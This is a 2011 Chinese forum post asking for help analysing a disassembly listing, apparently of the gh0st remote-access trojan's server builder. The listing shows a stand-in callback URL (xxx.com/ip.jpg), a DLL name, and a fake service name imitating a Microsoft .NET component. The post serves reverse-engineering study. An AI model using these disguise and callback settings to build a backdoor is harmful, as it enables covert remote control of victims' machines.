-
-
[旧帖] [求助]哪位高手进来帮忙分析,解答一下么,谢谢了 0.00雪花
-
发表于: 2011-6-10 22:20 1317
-
00402318 |. 50 push eax
00402319 |. 8BCB mov ecx, ebx
0040231B |. E8 D3101400 call 005433F3
00402320 |. BF 58075B00 mov edi, 005B0758 ; sgxy
00402325 |. 8BCB mov ecx, ebx
00402327 |. 57 push edi
00402328 |. 6A 00 push 0
0040232A |. E8 469E1300 call 0053C175
0040232F |. 57 push edi
00402330 |. 8BCB mov ecx, ebx
00402332 |. E8 0F131400 call 00543646
00402337 |. 6A 00 push 0
00402339 |. 8BCE mov ecx, esi
0040233B |. E8 24F81300 call 00541B64
00402340 |. 834D FC FF or dword ptr [ebp-4], FFFFFFFF
00402344 |. 8D4D F0 lea ecx, dword ptr [ebp-10]
00402347 |. E8 1E0F1400 call 0054326A
0040234C |. 8B4D F4 mov ecx, dword ptr [ebp-C]
0040234F |. 5F pop edi
00402350 |. 5E pop esi
00402351 |. 5B pop ebx
00402352 |. 64:890D 00000>mov dword ptr fs:[0], ecx
00402359 |. C9 leave
0040235A \. C2 0400 retn 4
0040235D /$ 68 68075B00 push 005B0768 ; /服务端生成
00402362 |. 6A 00 push 0 ; |Class = 0
00402364 |. FF15 90155700 call dword ptr [<&USER32.FindWindowA>>; \FindWindowA
0040236A |. 6A 00 push 0 ; /lParam = 0
0040236C |. 6A 01 push 1 ; |wParam = 1
0040236E |. 6A 10 push 10 ; |Message = WM_CLOSE
00402370 |. 50 push eax ; |hWnd
00402371 |. FF15 84155700 call dword ptr [<&USER32.PostMessageA>; \PostMessageA
00402377 \. C3 retn
00402378 . B8 04E85500 mov eax, 0055E804 ; 咐hy
0040237D . E8 F6611200 call 00528578
00402382 . 81EC B0040000 sub esp, 4B0
00402388 . 53 push ebx
00402389 . 56 push esi
0040238A . 57 push edi
0040238B . 8BD9 mov ebx, ecx
0040238D . E8 C8271400 call 00544B5A
00402392 . 33F6 xor esi, esi
00402394 . 56 push esi ; /Timerproc => NULL
00402395 . 6A 64 push 64 ; |Timeout = 100. ms
00402397 . 56 push esi ; |TimerID => 0
00402398 . FF73 1C push dword ptr [ebx+1C] ; |hWnd
0040239B . FF15 94155700 call dword ptr [<&USER32.SetTimer>] ; \SetTimer
004023A1 . 8D85 44FBFFFF lea eax, dword ptr [ebp-4BC]
004023A7 . 50 push eax ; /pWSAData
004023A8 . 68 01010000 push 101 ; |RequestedVersion = 101 (1.1.)
004023AD . FF15 B4195700 call dword ptr [<&WS2_32.#115>] ; \WSAStartup
004023B3 . 80A5 D4FDFFFF>and byte ptr [ebp-22C], 0
004023BA . 6A 7F push 7F
004023BC . 59 pop ecx
004023BD . 33C0 xor eax, eax
004023BF . 8DBD D5FDFFFF lea edi, dword ptr [ebp-22B]
004023C5 . 68 00020000 push 200 ; /BufSize = 200 (512.)
004023CA . F3:AB rep stos dword ptr es:[edi] ; |
004023CC . 66:AB stos word ptr es:[edi] ; |
004023CE . AA stos byte ptr es:[edi] ; |
004023CF . 8D85 D4FDFFFF lea eax, dword ptr [ebp-22C] ; |
004023D5 . 50 push eax ; |Buffer
004023D6 . FF15 B8195700 call dword ptr [<&WS2_32.#57>] ; \gethostname
004023DC . 85C0 test eax, eax
004023DE . 0F85 11040000 jnz 004027F5
004023E4 . 8D85 D4FDFFFF lea eax, dword ptr [ebp-22C]
004023EA . 50 push eax ; /Name
004023EB . FF15 BC195700 call dword ptr [<&WS2_32.#52>] ; \gethostbyname
004023F1 . 8BF8 mov edi, eax
004023F3 . 3BFE cmp edi, esi
004023F5 . 0F84 FA030000 je 004027F5
004023FB . 8B47 0C mov eax, dword ptr [edi+C]
004023FE . 8B00 mov eax, dword ptr [eax]
00402400 . 3BC6 cmp eax, esi
00402402 . 74 42 je short 00402446
00402404 . 8975 F0 mov dword ptr [ebp-10], esi
00402407 > 0FBF4F 0A movsx ecx, word ptr [edi+A]
0040240B . 51 push ecx
0040240C . 50 push eax
0040240D . 8D45 D8 lea eax, dword ptr [ebp-28]
00402410 . 50 push eax
00402411 . E8 8A611200 call 005285A0
00402416 . 83C4 0C add esp, 0C
00402419 . FF75 D8 push dword ptr [ebp-28]
0040241C . FF15 40195700 call dword ptr [<&WS2_32.#12>] ; WS2_32.inet_ntoa
00402422 . 50 push eax ; /lParam
00402423 . 56 push esi ; |wParam
00402424 . 68 43010000 push 143 ; |Message = CB_ADDSTRING
00402429 . FFB3 B4000000 push dword ptr [ebx+B4] ; |hWnd
0040242F . FF15 7C175700 call dword ptr [<&USER32.SendMessageA>; \SendMessageA
00402435 . 8345 F0 04 add dword ptr [ebp-10], 4
00402439 . 8B47 0C mov eax, dword ptr [edi+C]
0040243C . 8B4D F0 mov ecx, dword ptr [ebp-10]
0040243F . 8B0401 mov eax, dword ptr [ecx+eax]
00402442 . 3BC6 cmp eax, esi
00402444 .^ 75 C1 jnz short 00402407
00402446 > 8B3D 7C175700 mov edi, dword ptr [<&USER32.SendMes>; USER32.SendMessageA
0040244C . 56 push esi ; /lParam
0040244D . 56 push esi ; |wParam
0040244E . 68 4E010000 push 14E ; |Message = CB_SETCURSEL
00402453 . FFB3 B4000000 push dword ptr [ebx+B4] ; |hWnd
00402459 . FFD7 call edi ; \SendMessageA
0040245B . FF15 80195700 call dword ptr [<&WS2_32.#116>] ; [WSACleanup
00402461 . 80BB 44010000>cmp byte ptr [ebx+144], 0
00402468 . 0F84 13030000 je 00402781
0040246E . 56 push esi
0040246F . 8BCB mov ecx, ebx
00402471 . E8 EEF61300 call 00541B64
00402476 . 51 push ecx
00402477 . 8BCC mov ecx, esp
00402479 . 8965 E4 mov dword ptr [ebp-1C], esp
0040247C . 68 6C085B00 push 005B086C ; http://www.xxx.com/ip.jpg
00402481 . E8 520E1400 call 005432D8
00402486 . 51 push ecx
00402487 . 8975 FC mov dword ptr [ebp-4], esi
0040248A . 8BCC mov ecx, esp
0040248C . 8965 E8 mov dword ptr [ebp-18], esp
0040248F . 68 64085B00 push 005B0864 ; httpurl
00402494 . E8 3F0E1400 call 005432D8
00402499 . 51 push ecx
0040249A . BF 28075B00 mov edi, 005B0728 ; build
0040249F . 8BCC mov ecx, esp
004024A1 . 8965 EC mov dword ptr [ebp-14], esp
004024A4 . 57 push edi
004024A5 . C645 FC 01 mov byte ptr [ebp-4], 1
004024A9 . E8 2A0E1400 call 005432D8
004024AE . 834D FC FF or dword ptr [ebp-4], FFFFFFFF
004024B2 . 8D45 F0 lea eax, dword ptr [ebp-10]
004024B5 . 50 push eax
004024B6 . E8 F1160000 call 00403BAC
004024BB . 8BC8 mov ecx, eax
004024BD . BE C0000000 mov esi, 0C0
004024C2 . 03CE add ecx, esi
004024C4 . E8 37730000 call 00409800
004024C9 . FF30 push dword ptr [eax]
004024CB . 8BCB mov ecx, ebx
004024CD . C745 FC 03000>mov dword ptr [ebp-4], 3
004024D4 . 68 FD030000 push 3FD
004024D9 . E8 55021400 call 00542733
004024DE . 834D FC FF or dword ptr [ebp-4], FFFFFFFF
004024E2 . 8D4D F0 lea ecx, dword ptr [ebp-10]
004024E5 . E8 800D1400 call 0054326A
004024EA . 51 push ecx
004024EB . 8BCC mov ecx, esp
004024ED . 8965 EC mov dword ptr [ebp-14], esp
004024F0 . 68 58085B00 push 005B0858 ; qqcrt.dll
004024F5 . E8 DE0D1400 call 005432D8
004024FA . 51 push ecx
004024FB . C745 FC 04000>mov dword ptr [ebp-4], 4
00402502 . 8BCC mov ecx, esp
00402504 . 8965 E8 mov dword ptr [ebp-18], esp
00402507 . 68 50085B00 push 005B0850 ; dllname
0040250C . E8 C70D1400 call 005432D8
00402511 . 51 push ecx
00402512 . C645 FC 05 mov byte ptr [ebp-4], 5
00402516 . 8BCC mov ecx, esp
00402518 . 8965 E4 mov dword ptr [ebp-1C], esp
0040251B . 57 push edi
0040251C . E8 B70D1400 call 005432D8
00402521 . 834D FC FF or dword ptr [ebp-4], FFFFFFFF
00402525 . 8D45 F0 lea eax, dword ptr [ebp-10]
00402528 . 50 push eax
00402529 . E8 7E160000 call 00403BAC
0040252E . 8BC8 mov ecx, eax
00402530 . 03CE add ecx, esi
00402532 . E8 C9720000 call 00409800
00402537 . FF30 push dword ptr [eax]
00402539 . 8BCB mov ecx, ebx
0040253B . C745 FC 07000>mov dword ptr [ebp-4], 7
00402542 . 68 61040000 push 461
00402547 . E8 E7011400 call 00542733
0040254C . 834D FC FF or dword ptr [ebp-4], FFFFFFFF
00402550 . 8D4D F0 lea ecx, dword ptr [ebp-10]
00402553 . E8 120D1400 call 0054326A
00402558 . 51 push ecx
00402559 . 8BCC mov ecx, esp
0040255B . 8965 EC mov dword ptr [ebp-14], esp
0040255E . 68 B8685C00 push 005C68B8
00402563 . E8 700D1400 call 005432D8
00402568 . 51 push ecx
00402569 . C745 FC 08000>mov dword ptr [ebp-4], 8
00402570 . 8BCC mov ecx, esp
00402572 . 8965 E8 mov dword ptr [ebp-18], esp
00402575 . 68 4C085B00 push 005B084C ; dns
0040257A . E8 590D1400 call 005432D8
0040257F . 51 push ecx
00402580 . C645 FC 09 mov byte ptr [ebp-4], 9
00402584 . 8BCC mov ecx, esp
00402586 . 8965 E4 mov dword ptr [ebp-1C], esp
00402589 . 57 push edi
0040258A . E8 490D1400 call 005432D8
0040258F . 834D FC FF or dword ptr [ebp-4], FFFFFFFF
00402593 . 8D45 F0 lea eax, dword ptr [ebp-10]
00402596 . 50 push eax
00402597 . E8 10160000 call 00403BAC
0040259C . 8BC8 mov ecx, eax
0040259E . 03CE add ecx, esi
004025A0 . E8 5B720000 call 00409800
004025A5 . FF30 push dword ptr [eax]
004025A7 . 8BCB mov ecx, ebx
004025A9 . C745 FC 0B000>mov dword ptr [ebp-4], 0B
004025B0 . 68 FE030000 push 3FE
004025B5 . E8 79011400 call 00542733
004025BA . 834D FC FF or dword ptr [ebp-4], FFFFFFFF
004025BE . 8D4D F0 lea ecx, dword ptr [ebp-10]
004025C1 . E8 A40C1400 call 0054326A
004025C6 . 51 push ecx
004025C7 . 8BCC mov ecx, esp
004025C9 . 8965 EC mov dword ptr [ebp-14], esp
004025CC . 68 44085B00 push 005B0844 ; .netshi
004025D1 . E8 020D1400 call 005432D8
004025D6 . 51 push ecx
004025D7 . C745 FC 0C000>mov dword ptr [ebp-4], 0C
004025DE . 8BCC mov ecx, esp
004025E0 . 8965 E8 mov dword ptr [ebp-18], esp
004025E3 . 68 38085B00 push 005B0838 ; servicename
004025E8 . E8 EB0C1400 call 005432D8
004025ED . 51 push ecx
004025EE . C645 FC 0D mov byte ptr [ebp-4], 0D
004025F2 . 8BCC mov ecx, esp
004025F4 . 8965 E4 mov dword ptr [ebp-1C], esp
004025F7 . 57 push edi
004025F8 . E8 DB0C1400 call 005432D8
004025FD . 834D FC FF or dword ptr [ebp-4], FFFFFFFF
00402601 . 8D45 F0 lea eax, dword ptr [ebp-10]
00402604 . 50 push eax
00402605 . E8 A2150000 call 00403BAC
0040260A . 8BC8 mov ecx, eax
0040260C . 03CE add ecx, esi
0040260E . E8 ED710000 call 00409800
00402613 . FF30 push dword ptr [eax]
00402615 . 8BCB mov ecx, ebx
00402617 . C745 FC 0F000>mov dword ptr [ebp-4], 0F
0040261E . 68 2C040000 push 42C
00402623 . E8 0B011400 call 00542733
00402628 . 834D FC FF or dword ptr [ebp-4], FFFFFFFF
0040262C . 8D4D F0 lea ecx, dword ptr [ebp-10]
0040262F . E8 360C1400 call 0054326A
00402634 . 51 push ecx
00402635 . 8BCC mov ecx, esp
00402637 . 8965 EC mov dword ptr [ebp-14], esp
0040263A . 68 10085B00 push 005B0810 ; microsoft .net framework com+ support
0040263F . E8 940C1400 call 005432D8
00402644 . 51 push ecx
00402645 . C745 FC 10000>mov dword ptr [ebp-4], 10
0040264C . 8BCC mov ecx, esp
0040264E . 8965 E8 mov dword ptr [ebp-18], esp
00402651 . 68 04085B00 push 005B0804 ; displayname
00402656 . E8 7D0C1400 call 005432D8
0040265B . 51 push ecx
0040265C . C645 FC 11 mov byte ptr [ebp-4], 11
00402660 . 8BCC mov ecx, esp
00402662 . 8965 E4 mov dword ptr [ebp-1C], esp
00402665 . 57 push edi
00402666 . E8 6D0C1400 call 005432D8
0040266B . 834D FC FF or dword ptr [ebp-4], FFFFFFFF
0040266F . 8D45 F0 lea eax, dword ptr [ebp-10]
00402672 . 50 push eax
00402673 . E8 34150000 call 00403BAC
00402678 . 8BC8 mov ecx, eax
0040267A . 03CE add ecx, esi
0040267C . E8 7F710000 call 00409800
00402681 . FF30 push dword ptr [eax]
00402683 . 8BCB mov ecx, ebx
00402685 . C745 FC 13000>mov dword ptr [ebp-4], 13
0040268C . 68 22040000 push 422
00402691 . E8 9D001400 call 00542733
00402696 . 834D FC FF or dword ptr [ebp-4], FFFFFFFF
0040269A . 8D4D F0 lea ecx, dword ptr [ebp-10]
0040269D . E8 C80B1400 call 0054326A
004026A2 . 51 push ecx
004026A3 . 8BCC mov ecx, esp
004026A5 . 8965 EC mov dword ptr [ebp-14], esp
004026A8 . 68 C8075B00 push 005B07C8 ; microsoft .net and windows xp com+ integration with soap
004026AD . E8 260C1400 call 005432D8
004026B2 . 51 push ecx
004026B3 . C745 FC 14000>mov dword ptr [ebp-4], 14
004026BA . 8BCC mov ecx, esp
004026BC . 8965 E8 mov dword ptr [ebp-18], esp
004026BF . 68 BC075B00 push 005B07BC ; description
004026C4 . E8 0F0C1400 call 005432D8
004026C9 . 51 push ecx
004026CA . C645 FC 15 mov byte ptr [ebp-4], 15
004026CE . 8BCC mov ecx, esp
004026D0 . 8965 E4 mov dword ptr [ebp-1C], esp
004026D3 . 57 push edi
004026D4 . E8 FF0B1400 call 005432D8
004026D9 . 834D FC FF or dword ptr [ebp-4], FFFFFFFF
004026DD . 8D45 F0 lea eax, dword ptr [ebp-10]
004026E0 . 50 push eax
004026E1 . E8 C6140000 call 00403BAC
004026E6 . 8BC8 mov ecx, eax
004026E8 . 03CE add ecx, esi
004026EA . E8 11710000 call 00409800
004026EF . FF30 push dword ptr [eax]
004026F1 . 8BCB mov ecx, ebx
004026F3 . C745 FC 17000>mov dword ptr [ebp-4], 17
004026FA . 68 23040000 push 423
004026FF . E8 2F001400 call 00542733
00402704 . 834D FC FF or dword ptr [ebp-4], FFFFFFFF
00402708 . 8D4D F0 lea ecx, dword ptr [ebp-10]
0040270B . E8 5A0B1400 call 0054326A
00402710 . 8BCB mov ecx, ebx
00402712 . E8 EF000000 call 00402806
00402717 . 8B83 40010000 mov eax, dword ptr [ebx+140]
0040271D . 8DB3 40010000 lea esi, dword ptr [ebx+140]
00402723 . 33FF xor edi, edi
00402725 . 3978 F8 cmp dword ptr [eax-8], edi
00402728 . 75 3F jnz short 00402769
0040272A . 8D85 D4FCFFFF lea eax, dword ptr [ebp-32C]
00402730 . 68 00010000 push 100 ; /BufSize = 100 (256.)
00402735 . 50 push eax ; |Buffer
00402736 . FF15 B8195700 call dword ptr [<&WS2_32.#57>] ; \gethostname
0040273C . 8D85 D4FCFFFF lea eax, dword ptr [ebp-32C]
00402742 . 50 push eax ; /Name
00402743 . FF15 BC195700 call dword ptr [<&WS2_32.#52>] ; \gethostbyname
00402749 . 3BC7 cmp eax, edi
0040274B . 74 10 je short 0040275D
0040274D . 8B40 0C mov eax, dword ptr [eax+C]
00402750 . 8B00 mov eax, dword ptr [eax]
00402752 . FF30 push dword ptr [eax]
00402754 . FF15 40195700 call dword ptr [<&WS2_32.#12>] ; WS2_32.inet_ntoa
0040275A . 50 push eax
0040275B . EB 05 jmp short 00402762
0040275D > 68 B0075B00 push 005B07B0 ; 127.0.0.1
00402762 > 8BCE mov ecx, esi
00402764 . E8 8A0C1400 call 005433F3
00402769 > 57 push edi
0040276A . 8BCB mov ecx, ebx
0040276C . E8 FCFAFFFF call 0040226D
00402771 . 57 push edi
00402772 . 8BCB mov ecx, ebx
00402774 . E8 EBF31300 call 00541B64
00402779 . 8B3D 7C175700 mov edi, dword ptr [<&USER32.SendMes>; USER32.SendMessageA
0040277F . 33F6 xor esi, esi
00402781 > 68 98075B00 push 005B0798 ; documents and settings
00402786 . 56 push esi
00402787 . BE 43010000 mov esi, 143
0040278C . 56 push esi
0040278D . FFB3 F0000000 push dword ptr [ebx+F0]
00402793 . FFD7 call edi
00402795 . 68 88075B00 push 005B0788 ; program files
0040279A . 6A 00 push 0
0040279C . 56 push esi
0040279D . FFB3 F0000000 push dword ptr [ebx+F0]
004027A3 . FFD7 call edi
004027A5 . 68 80075B00 push 005B0780 ; windows
004027AA . 6A 00 push 0
004027AC . 56 push esi
004027AD . FFB3 F0000000 push dword ptr [ebx+F0]
004027B3 . FFD7 call edi
004027B5 . 68 74075B00 push 005B0774 ; windows\web
004027BA . 6A 00 push 0
004027BC . 56 push esi
004027BD . FFB3 F0000000 push dword ptr [ebx+F0]
004027C3 . FFD7 call edi
004027C5 . 6A 00 push 0
004027C7 . 6A 03 push 3
004027C9 . 68 4E010000 push 14E
004027CE . FFB3 F0000000 push dword ptr [ebx+F0]
004027D4 . FFD7 call edi
004027D6 . 68 30040000 push 430
004027DB . 8BCB mov ecx, ebx
004027DD . E8 92FE1300 call 00542674
004027E2 . 6A 00 push 0
004027E4 . 6A 01 push 1
004027E6 . 68 F1000000 push 0F1
004027EB . FF70 1C push dword ptr [eax+1C]
004027EE . FFD7 call edi
004027F0 . 6A 01 push 1
004027F2 . 58 pop eax
004027F3 . EB 02 jmp short 004027F7
004027F5 > 33C0 xor eax, eax
004027F7 > 8B4D F4 mov ecx, dword ptr [ebp-C]
004027FA . 5F pop edi
004027FB . 5E pop esi
004027FC . 64:890D 00000>mov dword ptr fs:[0], ecx
00402803 . 5B pop ebx
00402804 . C9 leave
00402805 . C3 retn
00402806 /$ 56 push esi
00402807 |. 8BF1 mov esi, ecx
00402809 |. 6A 01 push 1
0040280B |. E8 54F31300 call 00541B64
00402810 |. FFB6 28010000 push dword ptr [esi+128]
00402816 |. 8BCE mov ecx, esi
00402818 |. 68 FD030000 push 3FD
0040281D |. E8 52FE1300 call 00542674
00402822 |. 8BC8 mov ecx, eax
00402824 |. E8 89011400 call 005429B2
00402829 |. 5E pop esi
0040282A \. C3 retn
0040282B . B8 18E85500 mov eax, 0055E818
00402830 . E8 435D1200 call 00528578
00402835 . 81EC B8020000 sub esp, 2B8
0040283B . A1 68395B00 mov eax, dword ptr [5B3968]
00402840 . 53 push ebx
00402841 . 56 push esi
00402842 . 57 push edi
00402843 . 8945 EC mov dword ptr [ebp-14], eax
00402846 . 6A 01 push 1
00402848 . 8D85 3CFDFFFF lea eax, dword ptr [ebp-2C4]
0040284E . 5B pop ebx
0040284F . 33FF xor edi, edi
00402851 . 50 push eax ; /pWSAData
00402852 . 68 01020000 push 201 ; |RequestedVersion = 201 (1.2.)
00402857 . 897D FC mov dword ptr [ebp-4], edi ; |
0040285A . 885D F3 mov byte ptr [ebp-D], bl ; |
0040285D . FF15 B4195700 call dword ptr [<&WS2_32.#115>] ; \WSAStartup
00402863 . 6A 06 push 6 ; /Protocol = IPPROTO_TCP
00402865 . 53 push ebx ; |Type => SOCK_STREAM
00402866 . 6A 02 push 2 ; |Family = AF_INET
00402868 . FF15 9C195700 call dword ptr [<&WS2_32.#23>] ; \socket
0040286E . 8BF0 mov esi, eax
00402870 . 83FE FF cmp esi, -1
00402873 . 75 18 jnz short 0040288D
00402875 . 6A 40 push 40 ; /Style = MB_OK|MB_ICONASTERISK|MB_APPLMODAL
00402877 . 68 E8085B00 push 005B08E8 ; |提示
0040287C . 68 D4085B00 push 005B08D4 ; |socket 初始化失败
00402881 . 57 push edi ; |hOwner => NULL
00402882 . FF15 98155700 call dword ptr [<&USER32.MessageBoxA>>; \MessageBoxA
00402888 . E9 E1000000 jmp 0040296E
0040288D > 8D45 E8 lea eax, dword ptr [ebp-18]
00402890 . 895D E8 mov dword ptr [ebp-18], ebx
00402893 . 50 push eax ; /Parm
00402894 . 68 7E660480 push 8004667E ; |Cmd = FIONBIO
00402899 . 56 push esi ; |Socket
0040289A . FF15 A0195700 call dword ptr [<&WS2_32.#10>] ; \ioctlsocket
004028A0 . 897D E4 mov dword ptr [ebp-1C], edi
004028A3 . 8B7D 08 mov edi, dword ptr [ebp+8]
004028A6 . C745 E0 03000>mov dword ptr [ebp-20], 3
004028AD . FFB7 40010000 push dword ptr [edi+140] ; /Name
004028B3 . FF15 BC195700 call dword ptr [<&WS2_32.#52>] ; \gethostbyname
004028B9 . 85C0 test eax, eax
004028BB . 8945 08 mov dword ptr [ebp+8], eax
004028BE . 74 5E je short 0040291E
004028C0 . FFB7 20010000 push dword ptr [edi+120]
004028C6 . 66:C745 D0 02>mov word ptr [ebp-30], 2
004028CC . FF15 A41D5900 call dword ptr [591DA4] ; gh0st.00529FFF
004028D2 . 59 pop ecx
004028D3 . 50 push eax ; /NetShort
004028D4 . FF15 A4195700 call dword ptr [<&WS2_32.#9>] ; \ntohs
004028DA . 66:8945 D2 mov word ptr [ebp-2E], ax
004028DE . 8B45 08 mov eax, dword ptr [ebp+8]
004028E1 . 6A 10 push 10 ; /AddrLen = 10 (16.)
004028E3 . 8B40 0C mov eax, dword ptr [eax+C] ; |
004028E6 . 8B00 mov eax, dword ptr [eax] ; |
004028E8 . 8B00 mov eax, dword ptr [eax] ; |
004028EA . 8945 D4 mov dword ptr [ebp-2C], eax ; |
004028ED . 8D45 D0 lea eax, dword ptr [ebp-30] ; |
004028F0 . 50 push eax ; |pSockAddr
004028F1 . 56 push esi ; |Socket
004028F2 . FF15 A8195700 call dword ptr [<&WS2_32.#4>] ; \connect
004028F8 . 8D45 E0 lea eax, dword ptr [ebp-20]
004028FB . 8D8D CCFEFFFF lea ecx, dword ptr [ebp-134]
00402901 . 50 push eax ; /pTimeout
00402902 . 33C0 xor eax, eax ; |
00402904 . 50 push eax ; |Exceptfds => NULL
00402905 . 51 push ecx ; |Writefds
00402906 . 50 push eax ; |Readfds => NULL
00402907 . 50 push eax ; |nfds => 0
00402908 . 89B5 D0FEFFFF mov dword ptr [ebp-130], esi ; |
0040290E . 899D CCFEFFFF mov dword ptr [ebp-134], ebx ; |
00402914 . FF15 AC195700 call dword ptr [<&WS2_32.#18>] ; \select
0040291A . 85C0 test eax, eax
0040291C . 7F 04 jg short 00402922
0040291E > 8065 F3 00 and byte ptr [ebp-D], 0
00402922 > 56 push esi ; /Socket
00402923 . FF15 B0195700 call dword ptr [<&WS2_32.#3>] ; \closesocket
00402929 . FF15 80195700 call dword ptr [<&WS2_32.#116>] ; [WSACleanup
0040292F . FFB7 20010000 push dword ptr [edi+120]
00402935 . 807D F3 00 cmp byte ptr [ebp-D], 0
00402939 . FFB7 40010000 push dword ptr [edi+140]
0040293F . 74 07 je short 00402948
00402941 . 68 AC085B00 push 005B08AC ; 成功连接到主机“%s”的“%s”端口 ...
00402946 . EB 05 jmp short 0040294D
00402948 > 68 88085B00 push 005B0888 ; 打开到主机“%s:%s”的连接失败 ...
0040294D > 8D45 EC lea eax, dword ptr [ebp-14]
00402950 . 50 push eax
00402951 . E8 C99F1300 call 0053C91F
00402956 . 83C4 10 add esp, 10
00402959 . 6A 40 push 40 ; /Style = MB_OK|MB_ICONASTERISK|MB_APPLMODAL
0040295B . 68 E8085B00 push 005B08E8 ; |提示
00402960 . FF75 EC push dword ptr [ebp-14] ; |Text
00402963 . 6A 00 push 0 ; |hOwner = NULL
00402965 . FF15 98155700 call dword ptr [<&USER32.MessageBoxA>>; \MessageBoxA
0040296B . 83CF FF or edi, FFFFFFFF
0040296E > 834D FC FF or dword ptr [ebp-4], FFFFFFFF
00402972 . 8D4D EC lea ecx, dword ptr [ebp-14]
00402975 . E8 F0081400 call 0054326A
0040297A . 8B4D F4 mov ecx, dword ptr [ebp-C]
0040297D . 8BC7 mov eax, edi
0040297F . 5F pop edi
00402980 . 5E pop esi
00402981 . 5B pop ebx
00402982 . 64:890D 00000>mov dword ptr fs:[0], ecx
00402989 . C9 leave
0040298A . C2 0400 retn 4
0040298D . 56 push esi
0040298E . 57 push edi
0040298F . 8BF1 mov esi, ecx
00402991 . 6A 01 push 1
00402993 . E8 CCF11300 call 00541B64
00402998 . 8DBE 40010000 lea edi, dword ptr [esi+140]
0040299E . 8BCE mov ecx, esi
004029A0 . 57 push edi
004029A1 . 68 FF030000 push 3FF
004029A6 . E8 C9FC1300 call 00542674
004029AB . 8BC8 mov ecx, eax
004029AD . E8 53D71300 call 00540105
004029B2 . 8B0F mov ecx, dword ptr [edi]
004029B4 . 33C0 xor eax, eax
004029B6 . 3941 F8 cmp dword ptr [ecx-8], eax
004029B9 . 74 35 je short 004029F0
004029BB . 8B8E 20010000 mov ecx, dword ptr [esi+120]
004029C1 . 3941 F8 cmp dword ptr [ecx-8], eax
004029C4 . 74 2A je short 004029F0
004029C6 . 3986 28010000 cmp dword ptr [esi+128], eax
004029CC . 74 09 je short 004029D7
004029CE . 8BCE mov ecx, esi
004029D0 . E8 8A0D0000 call 0040375F
004029D5 . EB 2C jmp short 00402A03
004029D7 > 50 push eax ; /pThreadId
004029D8 . 50 push eax ; |CreationFlags
004029D9 . 56 push esi ; |pThreadParm
004029DA . 68 2B284000 push 0040282B ; |ThreadFunction = gh0st.0040282B
004029DF . 50 push eax ; |StackSize
004029E0 . 50 push eax ; |pSecurity
004029E1 . FF15 98145700 call dword ptr [<&KERNEL32.CreateThre>; \CreateThread
004029E7 . 50 push eax ; /hObject
004029E8 . FF15 9C145700 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
004029EE . EB 13 jmp short 00402A03
004029F0 > 6A 40 push 40 ; /Style = MB_OK|MB_ICONASTERISK|MB_APPLMODAL
004029F2 . 68 E8085B00 push 005B08E8 ; |提示
004029F7 . 68 F0085B00 push 005B08F0 ; |请完整填服务器信息
004029FC . 50 push eax ; |hOwner
004029FD . FF15 98155700 call dword ptr [<&USER32.MessageBoxA>>; \MessageBoxA
00402A03 > 5F pop edi
00402A04 . 5E pop esi
00402A05 . C3 retn
00402A06 . B8 75E85500 mov eax, 0055E875
00402A0B . E8 685B1200 call 00528578
00402A10 . 81EC 180B0000 sub esp, 0B18
00402A16 . 53 push ebx
00402A17 . 56 push esi
00402A18 . 57 push edi
00402A19 . 8BF9 mov edi, ecx
00402A1B . 8965 F0 mov dword ptr [ebp-10], esp
00402A1E . 6A 01 push 1
00402A20 . 897D CC mov dword ptr [ebp-34], edi
00402A23 . E8 3CF11300 call 00541B64
00402A28 . 8D87 18010000 lea eax, dword ptr [edi+118]
00402A2E . 33DB xor ebx, ebx
00402A30 . 8945 B8 mov dword ptr [ebp-48], eax
00402A33 . 8B00 mov eax, dword ptr [eax]
00402A35 . 3958 F8 cmp dword ptr [eax-8], ebx
00402A38 . 74 0B je short 00402A45
00402A3A . 8B87 14010000 mov eax, dword ptr [edi+114]
00402A40 . 3958 F8 cmp dword ptr [eax-8], ebx
00402A43 . 75 33 jnz short 00402A78
00402A45 > 68 30040000 push 430
00402A4A . 8BCF mov ecx, edi
00402A4C . E8 23FC1300 call 00542674
00402A51 . 53 push ebx ; /lParam
00402A52 . BE F0000000 mov esi, 0F0 ; |
00402A57 . 53 push ebx ; |wParam
00402A58 . 56 push esi ; |Message => BM_GETCHECK
00402A59 . FF70 1C push dword ptr [eax+1C] ; |hWnd
00402A5C . FF15 7C175700 call dword ptr [<&USER32.SendMessageA>; \SendMessageA
00402A62 . 83F8 01 cmp eax, 1
00402A65 . 75 16 jnz short 00402A7D
00402A67 . 6A 40 push 40
00402A69 . 68 E8085B00 push 005B08E8 ; 提示
00402A6E . 68 100B5B00 push 005B0B10 ; 请完整填写服务的显示名称及其描述...
00402A73 . E9 88090000 jmp 00403400
00402A78 > BE F0000000 mov esi, 0F0
00402A7D > 8B87 1C010000 mov eax, dword ptr [edi+11C]
00402A83 . 3958 F8 cmp dword ptr [eax-8], ebx
00402A86 . 75 2E jnz short 00402AB6
00402A88 . 68 30040000 push 430
00402A8D . 8BCF mov ecx, edi
00402A8F . E8 E0FB1300 call 00542674
00402A94 . 53 push ebx ; /lParam
00402A95 . 53 push ebx ; |wParam
00402A96 . 56 push esi ; |Message
00402A97 . FF70 1C push dword ptr [eax+1C] ; |hWnd
00402A9A . FF15 7C175700 call dword ptr [<&USER32.SendMessageA>; \SendMessageA
00402AA0 . 83F8 01 cmp eax, 1
00402AA3 . 75 11 jnz short 00402AB6
00402AA5 . 6A 40 push 40
00402AA7 . 68 E8085B00 push 005B08E8 ; 提示
00402AAC . 68 F80A5B00 push 005B0AF8 ; 请完整填写服务名称...
00402AB1 . E9 4A090000 jmp 00403400
00402AB6 > 8B87 24010000 mov eax, dword ptr [edi+124]
00402ABC . 3958 F8 cmp dword ptr [eax-8], ebx
00402ABF . 75 11 jnz short 00402AD2
00402AC1 . 6A 40 push 40
00402AC3 . 68 E8085B00 push 005B08E8 ; 提示
00402AC8 . 68 E00A5B00 push 005B0AE0 ; 请完整填写dll名称...
00402ACD . E9 2E090000 jmp 00403400
00402AD2 > FFB7 20010000 push dword ptr [edi+120]
00402AD8 . FF15 A41D5900 call dword ptr [591DA4] ; gh0st.00529FFF
00402ADE . 83F8 01 cmp eax, 1
00402AE1 . 59 pop ecx
00402AE2 . 0F8E 0C090000 jle 004033F4
00402AE8 . 3D FFFF0000 cmp eax, 0FFFF
00402AED . 0F8D 01090000 jge 004033F4
00402AF3 . A1 68395B00 mov eax, dword ptr [5B3968]
00402AF8 . 8945 E8 mov dword ptr [ebp-18], eax
00402AFB . 895D FC mov dword ptr [ebp-4], ebx
00402AFE . 8945 E4 mov dword ptr [ebp-1C], eax
00402B01 . 8945 D4 mov dword ptr [ebp-2C], eax
00402B04 . 8D45 E4 lea eax, dword ptr [ebp-1C]
